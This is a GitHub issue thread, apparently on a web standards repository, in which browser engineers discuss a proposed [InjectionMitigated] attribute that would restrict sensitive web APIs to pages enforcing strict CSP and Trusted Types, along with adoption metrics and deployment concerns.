Open mikewest opened 1 month ago
cc @domenic, @johnwilander, @camillelamy, and @lweichselbaum who participated in the conversation at TPAC for additional feedback, along with @rbyers and @bvandersloot-mozilla who seemed at least conceptually interested in this kind of thing for digital credentials (if worried about deployment cost).
I should also have mentioned that we're experimenting with this in Chromium for a single API with some weird Origin Trial constraints. It seems fairly straightforwardly implementable, and the constraints seem robust-enough given our current experience with both CSP and Trusted Types.
FYI, the current implementation seems to prohibit 'unsafe-eval'
. While this might be okay for applying the InjectionMitigated
restriction to new APIs, it might make it diffuclt for old sites to adapt to InjectionMitigated
when applying the restriction to old APIs.
One way to solve this, is to check if Trusted Types is enforced, and createScript
is "strictly" validated (whatever that means). In which case, we could allow 'unsafe-eval'
as the script going to eval
is validated by Trusted Types.
I'd love to see a public UseCounter tracking the fraction of Chrome page loads and top sites (via HttpArchive crawls) which meet this criteria. We should totally be doing what we can to encourage that to grow. Like with [SecureContext] when it gets large enough to justify it as a credible best practice, then I would also support moving powerful APIs behind [InjectionMitigated]. I'm just skeptical that we're really anywhere near that today. Eg. for Digital Credentials, I'd worry that we'd mostly just drive people to the less secure approach of using custom schemes.
A likely good early partner might be Shopify, seems related to (but even harder than?) their efforts for PCIv4 compliance. @yoavweiss
My main concern here is that we did a good amount of work to add [CrossOriginIsolated], and it got used in one Chromium-only-so-far API. I wish we had instead asked that single API to add the appropriate "If" statement into its algorithm, and only added a Web IDL extended attribute after seeing adoption across several APIs.
On the other hand, at TPAC we discussed how meeting the [InjectionMitigated] bar might be easier than [CrossOriginIsolated], since it doesn't require updating all your third parties recursively. So maybe it will end up seeing more use. I think @RByers's suggestion is a good way to start investigating that question, since it will inform how many feature authors are interested in adopting this requirement for their APIs.
Thanks for your feedback!
@shhnjk: I think this is what the proposal in https://github.com/w3c/webappsec-csp/pull/665 would address? If we landed that, we'd change the rules here accordingly.
@domenic: I agree with you that the bar for injection mitigation is lower than the unfortunately very difficult deployment story for cross-origin isolation in the status quo. As @RByers notes, collecting metrics is certainly a reasonable approach:
MainFrame
variant of our use counter metrics (which I don't think we publish?), the numbers are still quite respectable in aggregate: ~13% of top-level pages use a Strict CSP, ~6% enforce Trusted Types.These show a pretty reasonable adoption rate and/or prove theoretical deployability for these kinds of protections IMO, but the question of breadth is a real one: I'll dig through HTTP Archive a bit to get more numbers.
@shhnjk: I think this is what the proposal in w3c/webappsec-csp#665 would address? If we landed that, we'd change the rules here accordingly.
Oh nice! Yup, that would work, though it just means that a createScript
exists, but it is not validated (i.e. it could just be createScript: s=>s
). But I don't have a good answer to what "validation" here means from a browser point of view, so I think this is a good start for V1 proposal.
@domenic: I think a difference with [CrossOriginIsolated] is that conceptually only two APIs fall into the particular threat model it addresses (process-wide XS-Leaks). On the other hand, it would actually make sense to request [InjectionMitigated] for any new API gated behind a permission prompt, since the permission model is relying on XSS not happening on the page that requests it. Of course, whether this is actually doable from a compatibility perspective is a different question :). But at the very least, it means that there should be a lot more APIs for which we can consider requiring [InjectionMitigated] than APIs that require [CrossOriginIsolated].
What problem are you trying to solve?
It would be ideal to limit particularly interesting APIs to contexts in which the user agent can assume a hightened level of certainty that the code accessing the API is in fact the site's code, and not code that an attacker has cleverly found a way to inject into the page.
Over the last ~decade, we've landed on a combination of https://web.dev/articles/strict-csp and Trusted Types as sufficient mitigation. Perhaps we could choose to expose certain APIs only in contexts using those protections. This approach would be conceptually similar to the existing
[SecureContext]
and[CrossOriginIsolated]
extended attributes.What solutions exist today?
Developers could choose to use Permission Policy to deny themselves access to certain capabilities if they're not sending appropriate injection-mitigation headers down to the client. This is a reasonable opt-out solution, but it's somehow unreasonable to expect every developer to make the effort/reward tradeoff.
How would you solve it?
https://mikewest.github.io/injection-mitigated/ sketches the approach with a few monkey-patches to CSP, HTML, and WebIDL.
Anything else?
https://github.com/WICG/digital-credentials/issues/133 is an example of the kind of API I'm thinking about. We also discussed this briefly in WebAppSec's meetings at TPAC last month: https://github.com/w3c/webappsec/blob/main/meetings/2024/2024-09-23-TPAC-Minutes.md#injectionmitigated.